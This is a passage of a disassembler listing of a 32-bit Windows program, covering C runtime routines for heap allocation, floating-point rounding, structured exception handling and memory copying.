push esi
loc_417B78: ; CODE XREF: sub_417B5F+26�j
mov si, [edx]
mov [ecx], si
inc ecx
inc ecx
inc edx
inc edx
test si, si
jnz short loc_417B78
pop esi
retn
sub_417B5F endp
; =============== S U B R O U T I N E =======================================
sub_417B89 proc near ; CODE XREF: sub_402B84+220�p
; sub_402DD7+C1�p ...
arg_0 = dword ptr 4
push ds:dword_48A074
push [esp+4+arg_0]
call sub_417B9B
pop ecx
pop ecx
retn
sub_417B89 endp
; =============== S U B R O U T I N E =======================================
sub_417B9B proc near ; CODE XREF: sub_417B89+A�p
; sub_4185F5+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_417BC4
loc_417BA2: ; CODE XREF: sub_417B9B+27�j
push [esp+arg_0]
call sub_417BC7
test eax, eax
pop ecx
jnz short locret_417BC6
cmp [esp+arg_4], eax
jz short locret_417BC6
push [esp+arg_0]
call sub_41AB54
test eax, eax
pop ecx
jnz short loc_417BA2
loc_417BC4: ; CODE XREF: sub_417B9B+5�j
xor eax, eax
locret_417BC6: ; CODE XREF: sub_417B9B+13�j
; sub_417B9B+19�j
retn
sub_417B9B endp
; =============== S U B R O U T I N E =======================================
sub_417BC7 proc near ; CODE XREF: sub_417B9B+B�p
arg_0 = dword ptr 4
mov eax, ds:dword_48B688
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_417BEB
cmp esi, ds:dword_48B680
ja short loc_417C1D
push esi
call sub_41B0DD
test eax, eax
pop ecx
jz short loc_417C1D
pop esi
retn
; ---------------------------------------------------------------------------
loc_417BEB: ; CODE XREF: sub_417BC7+D�j
cmp eax, 2
jnz short loc_417C1D
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_417C00
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_417C03
; ---------------------------------------------------------------------------
loc_417C00: ; CODE XREF: sub_417BC7+2F�j
push 10h
pop esi
loc_417C03: ; CODE XREF: sub_417BC7+37�j
cmp esi, ds:dword_43B7E4
ja short loc_417C2A
mov eax, esi
shr eax, 4
push eax
call sub_41BB80
test eax, eax
pop ecx
jnz short loc_417C39
jmp short loc_417C2A
; ---------------------------------------------------------------------------
loc_417C1D: ; CODE XREF: sub_417BC7+15�j
; sub_417BC7+20�j ...
test esi, esi
jnz short loc_417C24
push 1
pop esi
loc_417C24: ; CODE XREF: sub_417BC7+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_417C2A: ; CODE XREF: sub_417BC7+42�j
; sub_417BC7+54�j
push esi
push 0
push ds:dword_48B684
call ds:dword_4240E8 ; RtlAllocateHeap
loc_417C39: ; CODE XREF: sub_417BC7+52�j
pop esi
retn
sub_417BC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C3B proc near ; CODE XREF: sub_402DD7+10E�p
; sub_402DD7+116�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_417CA1
mov eax, ds:dword_48B688
cmp eax, 3
jnz short loc_417C67
push esi
call sub_41AD89
pop ecx
test eax, eax
push esi
jz short loc_417C93
push eax
call sub_41ADB4
pop ecx
pop ecx
jmp short loc_417CA1
; ---------------------------------------------------------------------------
loc_417C67: ; CODE XREF: sub_417C3B+14�j
cmp eax, 2
jnz short loc_417C92
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_41BAE4
add esp, 0Ch
test eax, eax
jz short loc_417C92
push eax
push [ebp+arg_0]
push [ebp+var_4]
call sub_41BB3B
add esp, 0Ch
jmp short loc_417CA1
; ---------------------------------------------------------------------------
loc_417C92: ; CODE XREF: sub_417C3B+2F�j
; sub_417C3B+44�j
push esi
loc_417C93: ; CODE XREF: sub_417C3B+20�j
push 0
push ds:dword_48B684
call ds:dword_4240E4 ; RtlFreeHeap
loc_417CA1: ; CODE XREF: sub_417C3B+A�j
; sub_417C3B+2A�j ...
pop esi
leave
retn
sub_417C3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417CA4(double)
sub_417CA4 proc near ; CODE XREF: sub_403FE6+38�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_439560
call sub_41C77D
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_417D2A
call sub_41C645
pop ecx
test eax, eax
pop ecx
jle short loc_417D0D
cmp eax, 2
jle short loc_417CFF
cmp eax, 3
jnz short loc_417D0D
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_41BF55
add esp, 10h
jmp short loc_417D6F
; ---------------------------------------------------------------------------
loc_417CFF: ; CODE XREF: sub_417CA4+3F�j
push esi
push ebx
call sub_41C77D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_417D6F
; ---------------------------------------------------------------------------
loc_417D0D: ; CODE XREF: sub_417CA4+3A�j
; sub_417CA4+44�j
fld [ebp+arg_0]
fadd ds:dbl_4246A8
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_417D67
; ---------------------------------------------------------------------------
loc_417D2A: ; CODE XREF: sub_417CA4+2F�j
call sub_41C60A
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_417D4D
loc_417D3F: ; CODE XREF: sub_417CA4+AC�j
push esi
push ebx
call sub_41C77D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_417D6F
; ---------------------------------------------------------------------------
loc_417D4D: ; CODE XREF: sub_417CA4+99�j
test bl, 20h
jnz short loc_417D3F
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_417D67: ; CODE XREF: sub_417CA4+84�j
call sub_41BFA8
add esp, 1Ch
loc_417D6F: ; CODE XREF: sub_417CA4+59�j
; sub_417CA4+67�j ...
pop esi
pop ebx
leave
retn
sub_417CA4 endp
; =============== S U B R O U T I N E =======================================
sub_417D73 proc near ; CODE XREF: sub_419AB8+9�p
; sub_41C846+21�p
; DATA XREF: ...
call sub_417D8B
call sub_41C846
mov ds:dword_489FF4, eax
call sub_41C7F6
fnclex
retn
sub_417D73 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_417D8B proc near ; CODE XREF: sub_417D73�p
mov eax, offset sub_41CC34
mov ds:off_43B904, offset sub_41C8C9
mov ds:off_43B900, eax
mov ds:off_43B908, offset sub_41C92F
mov ds:off_43B90C, offset sub_41C86F
mov ds:off_43B910, offset sub_41C917
mov ds:off_43B914, eax
retn
sub_417D8B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417DC4 proc near ; CODE XREF: sub_403FE6+1B�p
; sub_403FE6+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_417DC4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417DEB(double)
sub_417DEB proc near ; CODE XREF: sub_404032+82�p
; sub_40494F+3A1�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_439578
call sub_41C77D
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_417E71
call sub_41C645
pop ecx
test eax, eax
pop ecx
jle short loc_417E54
cmp eax, 2
jle short loc_417E46
cmp eax, 3
jnz short loc_417E54
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_41BF55
add esp, 10h
jmp short loc_417EB6
; ---------------------------------------------------------------------------
loc_417E46: ; CODE XREF: sub_417DEB+3F�j
push esi
push ebx
call sub_41C77D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_417EB6
; ---------------------------------------------------------------------------
loc_417E54: ; CODE XREF: sub_417DEB+3A�j
; sub_417DEB+44�j
fld [ebp+arg_0]
fadd ds:dbl_4246A8
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_417EAE
; ---------------------------------------------------------------------------
loc_417E71: ; CODE XREF: sub_417DEB+2F�j
call sub_41C60A
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_417E94
loc_417E86: ; CODE XREF: sub_417DEB+AC�j
push esi
push ebx
call sub_41C77D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_417EB6
; ---------------------------------------------------------------------------
loc_417E94: ; CODE XREF: sub_417DEB+99�j
test bl, 20h
jnz short loc_417E86
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_417EAE: ; CODE XREF: sub_417DEB+84�j
call sub_41BFA8
add esp, 1Ch
loc_417EB6: ; CODE XREF: sub_417DEB+59�j
; sub_417DEB+67�j ...
pop esi
pop ebx
leave
retn
sub_417DEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EBA proc near ; CODE XREF: sub_41D0A5+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_417EBA endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_417EEE proc near ; CODE XREF: sub_41D256+199�p
; sub_41D41A+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_417EEE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417EF5 proc near ; CODE XREF: sub_41D256+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_417EF5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417EFC proc near ; CODE XREF: sub_4180AE+5C�p
; sub_41D0A5:loc_41D0D6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_417F24
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_422A4C ; RtlUnwind
loc_417F24: ; DATA XREF: sub_417EFC+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_417EFC endp
; ---------------------------------------------------------------------------
loc_417F4B: ; CODE XREF: _0:004230EC�j _0:00423109�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41CCAA
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F81 proc near ; CODE XREF: sub_41D120+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_417FD5
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41D4B0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_417F81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FD5 proc near ; DATA XREF: sub_417F81+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41CCAA
add esp, 20h
pop ebp
retn
sub_417FD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417FFA proc near ; CODE XREF: sub_41CEEC+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_4180AE
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_418080
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_48A098
pop ecx
pop ecx
and [ebp+var_34], 0
loc_418080: ; DATA XREF: sub_417FFA+3C�o
cmp [ebp+var_4], 0
jz short loc_41809D
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_4180A6
; ---------------------------------------------------------------------------
loc_41809D: ; CODE XREF: sub_417FFA+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_4180A6: ; CODE XREF: sub_417FFA+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_417FFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4180AE proc near ; DATA XREF: sub_417FFA+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_4180D1
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_41811E
; ---------------------------------------------------------------------------
loc_4180D1: ; CODE XREF: sub_4180AE+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41CCAA
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_41810F
push [ebp+arg_0]
push [ebp+arg_4]
call sub_417EFC
loc_41810F: ; CODE XREF: sub_4180AE+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_41811E: ; CODE XREF: sub_4180AE+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4180AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418123 proc near ; CODE XREF: sub_41CD45+C6�p
; sub_41CEEC+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_41817A
loc_418141: ; CODE XREF: sub_418123+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_41814B
call sub_41D552
loc_41814B: ; CODE XREF: sub_418123+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_418160
cmp ecx, [eax+8]
jle short loc_418165
loc_418160: ; CODE XREF: sub_418123+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_418171
loc_418165: ; CODE XREF: sub_418123+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_418171: ; CODE XREF: sub_418123+40�j
cmp [ebp+arg_4], 0
jge short loc_418141
mov eax, [ebp+var_4]
loc_41817A: ; CODE XREF: sub_418123+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_41818E
cmp esi, eax
jbe short loc_418193
loc_41818E: ; CODE XREF: sub_418123+65�j
call sub_41D552
loc_418193: ; CODE XREF: sub_418123+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_418123 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181A0 proc near ; CODE XREF: sub_41F774+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4181B8
push [ebp+arg_0]
call sub_422A4C ; RtlUnwind
loc_4181B8: ; DATA XREF: sub_4181A0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4181A0 endp
; =============== S U B R O U T I N E =======================================
sub_4181C0 proc near ; DATA XREF: sub_4181E2+A�o
; sub_41824A+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4181E1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4181E1: ; CODE XREF: sub_4181C0+10�j
retn
sub_4181C0 endp
; =============== S U B R O U T I N E =======================================
sub_4181E2 proc near ; CODE XREF: sub_41D1C6+D�p
; sub_41F774+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4181C0
push large dword ptr fs:0
mov large fs:0, esp
loc_4181FF: ; CODE XREF: sub_4181E2:loc_41823A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41823C
cmp esi, [esp+1Ch+arg_4]
jz short loc_41823C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41823A
push 101h
mov eax, [ebx+esi*4+8]
call sub_418276
call dword ptr [ebx+esi*4+8]
loc_41823A: ; CODE XREF: sub_4181E2+44�j
jmp short loc_4181FF
; ---------------------------------------------------------------------------
loc_41823C: ; CODE XREF: sub_4181E2+2A�j
; sub_4181E2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4181E2 endp
; =============== S U B R O U T I N E =======================================
sub_41824A proc near ; CODE XREF: sub_41D1E6+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4181C0
jnz short locret_41826C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_41826C
mov eax, 1
locret_41826C: ; CODE XREF: sub_41824A+10�j
; sub_41824A+1B�j
retn
sub_41824A endp
; =============== S U B R O U T I N E =======================================
sub_41826D proc near ; CODE XREF: sub_41D4B0+1E�p
; sub_41D4B0+40�p
push ebx
push ecx
mov ebx, offset dword_43957C
jmp short loc_418280
sub_41826D endp
; =============== S U B R O U T I N E =======================================
sub_418276 proc near ; CODE XREF: sub_4181E2+4F�p
; sub_41F774+78�p
push ebx
push ecx
mov ebx, offset dword_43957C
mov ecx, [ebp+8]
loc_418280: ; CODE XREF: sub_41826D+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_418276 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418290 proc near ; CODE XREF: sub_404032+5�p
; sub_4041D4+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_418290 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4182AF proc near ; CODE XREF: sub_404667+26�p
; _0:004227E2�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_417C3B
pop ecx
retn
sub_4182AF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182C0 proc near ; CODE XREF: sub_4046D8+3A�p
; sub_41ADB4+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4182E0
cmp edi, eax
jb loc_418458
loc_4182E0: ; CODE XREF: sub_4182C0+16�j
test edi, 3
jnz short loc_4182FC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41831C
rep movsd
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
loc_4182FC: ; CODE XREF: sub_4182C0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_418314
and eax, 3
add ecx, eax
jmp dword ptr loc_41831C+4[eax*4]
; ---------------------------------------------------------------------------
loc_418314: ; CODE XREF: sub_4182C0+46�j
jmp dword ptr loc_418418[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41831C: ; CODE XREF: sub_4182C0+31�j
; sub_4182C0+8E�j ...
jmp off_41839C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41832C+4
dd offset loc_41835C
; ---------------------------------------------------------------------------
loc_41832C: ; DATA XREF: sub_4182C0+64�o
add byte ptr [ebx-2EDCFFBFh], 8Ah
push es
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41831C
rep movsd
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41835C: ; DATA XREF: sub_4182C0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41831C
rep movsd
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41831C
rep movsd
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41839C dd offset loc_4183FF ; DATA XREF: sub_4182C0:loc_41831C�r
dd offset loc_4183EC
dd offset loc_4183E4
dd offset loc_4183DC
dd offset loc_4183D4
dd offset loc_4183CC
dd offset loc_4183C4
dd offset loc_4183BC
; ---------------------------------------------------------------------------
loc_4183BC: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4183C4: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4183CC: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4183D4: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4183DC: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4183E4: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4183EC: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4183FF: ; CODE XREF: sub_4182C0:loc_41831C�j
; DATA XREF: sub_4182C0:off_41839C�o
jmp off_418408[edx*4]
; ---------------------------------------------------------------------------
align 4
off_418408 dd offset loc_418418 ; DATA XREF: sub_4182C0+35�r
; sub_4182C0+92�r ...
dd offset loc_418420
dd offset loc_41842C
dd offset loc_418440
; ---------------------------------------------------------------------------
loc_418418: ; CODE XREF: sub_4182C0+35�j
; sub_4182C0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_418420: ; CODE XREF: sub_4182C0+35�j
; sub_4182C0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41842C: ; CODE XREF: sub_4182C0+35�j
; sub_4182C0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_418440: ; CODE XREF: sub_4182C0+35�j
; sub_4182C0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418458: ; CODE XREF: sub_4182C0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41848C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_418480
std
rep movsd
cld
jmp off_4185A0[edx*4]
; ---------------------------------------------------------------------------
align 10h
